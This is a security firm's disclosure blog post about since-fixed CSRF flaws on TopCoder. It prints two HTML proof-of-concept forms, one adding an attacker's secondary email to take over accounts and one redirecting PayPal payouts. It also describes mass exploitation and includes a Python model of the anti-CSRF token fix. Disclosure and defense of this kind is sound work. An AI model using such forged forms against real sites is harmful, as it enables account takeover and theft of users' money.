TopCoder.com Vulnerabilities – A tale of site-wide bugs leading to account compromise & payment hijacking
TopCoder.com is a website where the most skilled coders around the world solve challenges, compete, and write code to achieve specific tasks. High-profile companies such as Facebook, Google and Twitter draw on such websites in their recruitment process!
Topcoder is a company that administers contests in computer programming. Topcoder hosts fortnightly online competitive programming competitions—known as SRMs or “single round matches”—as well as weekly competitions in graphic design and development. The work in design and development produces useful software which is licensed for profit by Topcoder.
TopCoder’s Business Model
Topcoder sells software licenses to use the growing body of components that have been developed in competition and also acts as an outsourcing center, allowing companies to farm out custom design and development tasks to Topcoder competitors. Competitors involved in the creation of these components are paid royalties based on these sales.
The software resulting from algorithm competitions—and the less-frequent marathon matches—is not usually directly useful, but sponsor companies sometimes provide money to pay the victors. Statistics (including an overall “rating” for each developer) are tracked over time for competitors in each category.
A BIG NOTE
We at Seekurity do not support or encourage any form of random bug or vulnerability testing on websites, services or apps that do not have clear responsible disclosure rules. To be clear, we (@Seekurity) and (@TopCoder) agreed on doing this testing!
Back in May 2015, the Seekurity team responsibly reported site-wide CSRF vulnerabilities which, *if maliciously used*, would lead to full user account compromise and payment hijacking!
1. First scenario “Full Account Compromise”
The PoC code is:
<h1>TopCoder Full Account Takeover CSRF by @Seekurity</h1>
<!-- the form's action URL is not shown on the original page -->
<form action="[target endpoint not shown]" method="POST">
<input type="hidden" name="module" value="AddSecondEmail" />
<input type="hidden" name="em" value="symbiansymoh@" />
<input type="submit" value="One click Hijack" />
</form>
Submitting this form adds the email “firstname.lastname@example.org” as a secondary email on the victim’s TopCoder account. After that, the attacker can initiate the password reset procedure, receive the password reset link at the secondary email, change the victim’s password, and the account is theirs.
2. Second Scenario “Payment Hijack”
The PoC code is:
TopCoder.com Payment Hijack CSRF (All your money belongs to us) by @Seekurity<br />
<form action="https://community.topcoder.com/tc" method="POST">
<input type="hidden" name="module" value="EditPaymentPreferences" />
<input type="hidden" name="accrualAmount" value="25" />
<input type="hidden" name="paymentMethod" value="2" />
<input type="hidden" name="paypalAccount" value="email@example.com" />
<input type="submit" value="Hijack My Money" />
</form>
Submitting this form links a PayPal email account and sets an accrual amount, so the balance is automatically withdrawn to that account once it reaches that limit. This scenario is more critical than the account takeover one, since payment account linking can be done in bulk, whereas the takeover scenario needs a unique email for each account taken over: the labeled-email trick (e.g. attacker+[Random]@gmail.com) does not work there!
A Highlight on discovered issues
As you may notice, these two critical form actions were not protected by an anti-CSRF token, which means any TopCoder user could be CSRFed and their account hijacked with a single click (targeted attacks) or via random mass attacks (embed the PoC code on a popular website and bingo). Attackers could hijack any user account or change the payment info, and Bob’s your uncle!
It seems everyone cares about developing features without considering the potential for a security issue!
The issues have now been fixed by adding site-wide anti-CSRF tokens that protect sensitive form submissions against such attacks.
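To make the fix concrete, here is an added example (not TopCoder's code, and not from the original post) that models the vulnerable EditPaymentPreferences handler next to a hardened version using the synchronizer token pattern that the fix describes. The session store, the handler names, the "/tc" form action and the constructed form submissions are all assumptions for illustration; the field names are the ones shown in the PoC above.

```python
import hmac
import secrets
from html import escape

# Constructed server-side session for a logged-in "victim". In a real app this is keyed by
# a session cookie, which the browser attaches to a cross-site form POST automatically;
# that automatic cookie is the reason the page's PoC forms worked against the weak handler.
def new_session(user):
    return {
        "user": user,
        "csrf_token": None,
        "payment": {"paymentMethod": "1", "paypalAccount": f"{user}@example.com", "accrualAmount": 100},
    }

def issue_csrf_token(session):
    """Synchronizer token: a fresh random value stored in the session and echoed as a hidden
    field in every state-changing form. A third-party page cannot read it, so it cannot
    include it in a forged POST."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def csrf_token_is_valid(session, submitted):
    """Constant-time comparison of the submitted token against the session's token."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)

def render_payment_form(session, action):
    """The legitimate form the site itself serves: the same fields as the PoC plus the
    hidden token that only a same-origin page can obtain."""
    token = issue_csrf_token(session)
    return (
        f'<form action="{escape(action)}" method="POST">\n'
        f'<input type="hidden" name="csrf_token" value="{escape(token)}" />\n'
        '<input type="hidden" name="module" value="EditPaymentPreferences" />\n'
        '<input type="text" name="paypalAccount" />\n'
        '<input type="text" name="accrualAmount" />\n'
        '<input type="hidden" name="paymentMethod" value="2" />\n'
        '<input type="submit" value="Save" />\n'
        '</form>'
    )

def edit_payment_preferences_unprotected(session, form):
    """The handler as the page describes it: any authenticated POST is honoured."""
    if form.get("module") != "EditPaymentPreferences":
        return "ignored"
    session["payment"] = {
        "paymentMethod": form["paymentMethod"],
        "paypalAccount": form["paypalAccount"],
        "accrualAmount": int(form["accrualAmount"]),
    }
    return "updated"

def edit_payment_preferences_protected(session, form):
    """The fix the page reports: the same handler behind a per-session anti-CSRF token check."""
    if not csrf_token_is_valid(session, form.get("csrf_token")):
        return "rejected"
    return edit_payment_preferences_unprotected(session, form)

def simulate():
    """Replay a cross-site POST with the PoC's fields against both handlers."""
    # Constructed forged submission: the PoC's fields, and no token because the attacker's
    # page never saw the victim's form.
    forged = {
        "module": "EditPaymentPreferences",
        "accrualAmount": "25",
        "paymentMethod": "2",
        "paypalAccount": "attacker@example.com",
    }
    results = {}

    weak = new_session("victim")
    results["unprotected"] = edit_payment_preferences_unprotected(weak, forged)
    results["unprotected_paypal"] = weak["payment"]["paypalAccount"]

    hardened = new_session("victim")
    render_payment_form(hardened, "/tc")  # the victim has loaded the real form, so a token exists
    results["protected_forged"] = edit_payment_preferences_protected(hardened, forged)
    results["protected_paypal_after_forged"] = hardened["payment"]["paypalAccount"]

    # A token issued to a different session (e.g. the attacker's own account) must not validate.
    other = new_session("attacker")
    other_token = issue_csrf_token(other)
    results["protected_other_token"] = edit_payment_preferences_protected(
        hardened, {**forged, "csrf_token": other_token})

    # The legitimate submission carries the session's own token and goes through.
    legit = {**forged, "paypalAccount": "victim-new@example.com", "csrf_token": hardened["csrf_token"]}
    results["protected_legit"] = edit_payment_preferences_protected(hardened, legit)
    results["protected_paypal_after_legit"] = hardened["payment"]["paypalAccount"]
    return results

if __name__ == "__main__":
    for key, value in simulate().items():
        print(f"{key}: {value}")
```

The token is bound to the session rather than being a global secret, so a token the attacker obtains from their own account is useless against someone else's session. Marking the session cookie `SameSite=Lax` or `Strict` adds a second, independent layer against cross-site POSTs, but the server-side token check is what makes the handler safe on its own.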
Thanks for reading!
Building a website? Or already built one? Think twice before going public and let us protect your business!